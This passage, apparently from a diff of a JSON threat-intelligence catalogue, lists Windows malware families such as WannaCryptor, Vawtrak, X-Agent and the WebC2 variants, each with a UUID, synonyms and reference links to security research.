"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_024_ransom", + "https://twitter.com/malwrhunterteam/status/789161704106127360" + ] + }, + "uuid": "acf6c476-847c-477a-b640-18a5c99e3c2b", + "value": "Unidentified 024 (Ransomware)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_025_clickfraud", + "http://malware-traffic-analysis.net/2016/05/09/index.html" + ] + }, + "uuid": "f43a0e38-2394-4538-a123-4a0457096058", + "value": "Unidentified 025 (Clickfraud)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_028" + ] + }, + "uuid": "22a686d8-dd35-4a29-9437-b0ce7b5c204b", + "value": "Unidentified 028", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_029" + ] + }, + "uuid": "aff47054-7130-48ca-aa2c-247bdf44f180", + "value": "Unidentified 029", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_030", + "https://twitter.com/JaromirHorejsi/status/877811773826641920" + ] + }, + "uuid": "7287a0b0-b943-4007-952f-07b9475ec184", + "value": "Filecoder", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031" + ] + }, + "uuid": "122c1c9c-3131-4014-856c-7e8a0da57a6e", + "value": "Unidentified 031", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_032", + "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/" + ] + }, + "uuid": "799921d7-48e8-47a6-989e-487b527af37a", + "value": "Unidentified 032", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_033" + ] + }, + "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", + "value": "Unidentified 033", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_034", + "https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/" + ] + }, + "uuid": "f90e9fb9-d60d-415e-9f7f-786ee45f6947", + "value": "Unidentified 034", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_035" + ] + }, + "uuid": "ba014661-d1d4-4a69-a698-9f4120de9260", + "value": "Unidentified 035", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037" + ] + }, + "uuid": "d073f9e5-8aa8-4e66-ba47-f332759199a2", + "value": "Unidentified 037", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_038" + ] + }, + "uuid": "d53e96c5-abfa-4be4-bb33-0a898c5aff58", + "value": "Unidentified 038", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039" + ] + }, + "uuid": "97c1524a-c052-49d1-8770-14b513d8a830", + "value": "Unidentified 039", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041" + ] + }, + "uuid": "88d70171-fc89-44d1-8931-035c0b095247", + "value": "Unidentified 041", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042", + "http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/" + ] + }, + "uuid": "168bf2a1-45a5-41ac-b364-5740e7ce9757", + "value": "Unidentified 042", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044" + ] + }, + "uuid": "df9c8440-b4da-4226-b982-e510d06cf246", + "value": "Unidentified 044", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045" + ] + }, + "uuid": "4cb8235a-7e70-4fad-9244-69215750d559", + "value": "Unidentified 045", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_046", + "https://twitter.com/DrunkBinary/status/1006534471687004160" + ] + }, + "uuid": "878ab9fc-a526-43bd-81ac-3eba14ba0f1f", + "value": "Unidentified 046", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_047", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" + ] + }, + "uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2", + "value": "Unidentified 047", + "description": "RAT written in Delphi used by Patchwork APT." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_048", + "https://twitter.com/DrunkBinary/status/1002587521073721346" + ] + }, + "uuid": "3304c5ce-85f0-4648-b95f-33cf9621cd2f", + "value": "Unidentified 048 (Lazarus?)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_049", + "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/" + ] + }, + "uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb", + "value": "Unidentified 049 (Lazarus/RAT)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_051", + "https://twitter.com/CDA/status/1014144988454772736" + ] + }, + "uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5", + "value": "Unidentified 051", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_052" + ] + }, + "uuid": "80c12fcd-e5ef-4549-860d-7928363022f9", + "value": "Unidentified 052", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053", + "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" + ] + }, + "uuid": "b60e32bd-158a-42b9-ac21-288bca4c8233", + "value": "Unidentified 053 (Wonknu?)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unlock92", + "https://twitter.com/struppigel/status/810753660737073153", + "https://twitter.com/bartblaze/status/976188821078462465" + ] + }, + "uuid": "036e657f-a752-4a4c-bb30-f15c24d954e6", + "value": "Unlock92", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Rombrast" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.upas", + "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", + "https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html", + "https://twitter.com/ulexec/status/1005096227741020160" + ] + }, + "uuid": "b64ea39b-3ec2-49e3-8992-02d71c21b1bd", + "value": "UPAS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre", + "https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", + "https://secrary.com/ReversingMalware/Upatre/" + ] + }, + "uuid": "925390a6-f88d-46dc-96ae-4ebc9f0b50b0", + "value": "Upatre", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy" + ] + }, + "uuid": "5af4838f-1b4d-4f0b-bd27-50ef532e84f7", + "value": "Urausy", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Bebloh", + "Shiotob" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone", + "https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations", + "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html", + "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", + "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/", + "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", + "https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/", + "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/" + ] + }, + "uuid": "ed9f995b-1b41-4b83-a978-d956670fdfbe", + "value": "UrlZone", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Snake" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos" + ] + }, + "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", + "value": "Uroburos", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Catch", + "grabnew", + "NeverQuest" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak", + "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/", + "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf", + "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html", + "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", + "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" + ] + }, + "uuid": "b662c253-5c87-4ae6-a30e-541db0845f67", + "value": "Vawtrak", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.velso", + "https://www.bleepingcomputer.com/news/security/the-velso-ransomware-being-manually-installed-by-attackers/" + ] + }, + "uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f", + "value": "Velso Ransomware", + "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. " + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.venus_locker", + "https://twitter.com/JaromirHorejsi/status/813690129088937984" + ] + }, + "uuid": "7a0137ad-df7a-4fae-8365-eb36cc7e60cd", + "value": "Venus Locker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" + ] + }, + "uuid": "2d07a1bf-1d8d-4f1e-a02f-1a8ff5b76cd1", + "value": "Vermin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder", + "https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/" + ] + }, + "uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255", + "value": "Vflooder", + "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor", + "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" + ] + }, + "uuid": "30161733-993f-4a1c-bcc5-7b4f1cd7d9e4", + "value": "virdetdoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut", + "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/", + "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/" + ] + }, + "uuid": "2e99f27c-6791-4695-b88b-de4d4cbda8d6", + "value": "Virut", + "description": "" + }, + { + "meta": { + "synonyms": [ + "VMzeus", + "ZeusVM", + "Zberp" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus", + "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", + "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/", + "https://asert.arbornetworks.com/wp-content/uploads/2015/08/ZeusVM_Bits_and_Pieces.pdf" + ] + }, + "uuid": "c32740a4-db2c-4d71-80bd-7377185f4a6f", + "value": "VM Zeus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus", + "http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/" + ] + }, + "uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840", + "value": "Vobfus", + "description": "" + }, + { + "meta": { + "synonyms": [ + "FALLCHILL", + "Manuscrypt" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer", + "https://www.us-cert.gov/ncas/alerts/TA17-318B" + ] + }, + "uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f", + "value": "Volgmer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vreikstadi", + "https://twitter.com/malware_traffic/status/821483557990318080" + ] + }, + "uuid": "ab2a63f1-1afd-44e7-9cf4-c775dbee78f4", + "value": "Vreikstadi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer", + "http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis", + "http://www.xylibox.com/2013/01/vskimmer.html", + "https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/" + ] + }, + "uuid": "3eae1764-7ea6-43e6-85a1-b1dd0b4856b8", + "value": "vSkimmer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times", + "https://attack.mitre.org/wiki/Group/G0022" + ] + }, + "uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8", + "value": "w32times", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Wcry", + "WannaCry", + "Wana Decrypt0r" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor", + "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984", + "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today", + "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/", + "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign", + "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", + "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/", + "https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58", + "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html", + "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e", + "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html", + "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168", + "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/", + "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/", + "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html" + ] + }, + "uuid": "ad67ff31-2a02-43f9-8b12-7df7e4fcccd6", + "value": "WannaCryptor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer", + "https://blog.minerva-labs.com/waterminer-a-new-evasive-crypto-miner" + ] + }, + "uuid": "d536931e-ad4f-485a-b93d-fe05f23a9367", + "value": "WaterMiner", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout", + "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + ] + }, + "uuid": "d238262a-4832-408f-9926-a7174e671b50", + "value": "WaterSpout", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_adspace", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "e57c677f-0117-4e23-8c3f-a772ed809f4c", + "value": "WebC2-AdSpace", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ausov", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "64f5ae85-1324-43de-ba3a-063785567be0", + "value": "WebC2-Ausov", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_bolid", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "71292a08-9a7b-4df1-b1fd-7d80a8fcc18f", + "value": "WebC2-Bolid", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_cson", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "5371bc44-dc07-4992-a3d7-c21705c50ac4", + "value": "WebC2-Cson", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_div", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "acdda3e5-e776-419b-b060-14f3406de061", + "value": "WebC2-DIV", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_greencat", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "cfed10ed-6601-469e-a1df-2d561b031244", + "value": "WebC2-GreenCat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_head", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "f9f37707-36cf-4ad0-88e0-86f47cbe0ed6", + "value": "WebC2-Head", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_kt3", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "15094548-7555-43ee-8c0d-4557d6d8a087", + "value": "WebC2-Kt3", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_qbp", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "71d8ef43-3767-494b-afaa-f58aad70df65", + "value": "WebC2-Qbp", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_rave", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "5350bf3a-26b0-49fb-a0b8-dd68933ea78c", + "value": "WebC2-Rave", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_table", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "1035ea6f-6743-4e69-861c-454c19ec96ae", + "value": "WebC2-Table", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ugx", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "b459033c-2d19-49aa-a21f-44a01d1a4156", + "value": "WebC2-UGX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "52c1518d-175c-4b39-bc7c-353d2ddf382e", + "value": "WebC2-Yahoo", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor", + "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/" + ] + }, + "uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4", + "value": "WebMonitor RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess", + "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html" + ] + }, + "uuid": "d84ebd91-58f6-459f-96a1-d028a1719914", + "value": "WellMess", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire", + "https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/" + ] + }, + "uuid": "2f512a73-6847-4231-81c6-8b51af8b5be2", + "value": "WildFire", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", + "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" + ] + }, + "uuid": "6a100902-7204-4f20-b838-545ed86d4428", + "value": "WinMM", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti", + "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/", + "https://www.protectwise.com/blog/winnti-evolution-going-open-source.html", + "https://github.com/TKCERT/winnti-nmap-script", + "https://github.com/TKCERT/winnti-suricata-lua", + "https://github.com/TKCERT/winnti-detector" + ] + }, + "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", + "value": "Winnti", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader", + "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" + ] + }, + "uuid": "db755407-4135-414c-90e3-97f5e48c6065", + "value": "Winsloader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf" + ] + }, + "uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4", + "value": "Wipbot", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Wimmie", + "Syndicasec" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost", + "https://secrary.com/ReversingMalware/WMIGhost/", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" + ] + }, + "uuid": "892cb6c2-b96c-4f77-a9cf-4dd3d0c1cc40", + "value": "WMI Ghost", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "d8bf4ea1-054c-4a88-aa09-48da0d89c322", + "value": "WndTest", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu", + "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" + ] + }, + "uuid": "bfa75eb1-1d8d-4127-932f-3b7090a242e9", + "value": "Wonknu", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.woody", + "https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-advanced-persistent-threat-malware-33814" + ] + }, + "uuid": "42e23d17-8f1b-43c9-bc76-e3cf098b5c52", + "value": "woody", + "description": "" + }, + { + "meta": { + "synonyms": [ + "WoolenLogger" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger", + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf", + "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf" + ] + }, + "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267", + "value": "Woolger", + "description": "" + }, + { + "meta": { + "synonyms": [ + "splm", + "chopstick" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent", + "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf" + ] + }, + "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", + "value": "X-Agent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos", + "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html" + ] + }, + "uuid": "c6467cc3-dafd-482e-881e-ef2e7e244436", + "value": "XBot POS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl" + ] + }, + "uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed", + "value": "XBTL", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan", + "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/", + "https://securelist.com/blog/research/78110/xpan-i-am-your-father/" + ] + }, + "uuid": "4da036c4-b76d-4f25-bc9e-3c5944ad0993", + "value": "Xpan", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Expectra" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpctra", + "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/", + "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis" + ] + }, + "uuid": "5f9ba149-100a-46eb-a959-0645d872975b", + "value": "XPCTRA", + "description": "Incorporates code of Quasar RAT." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 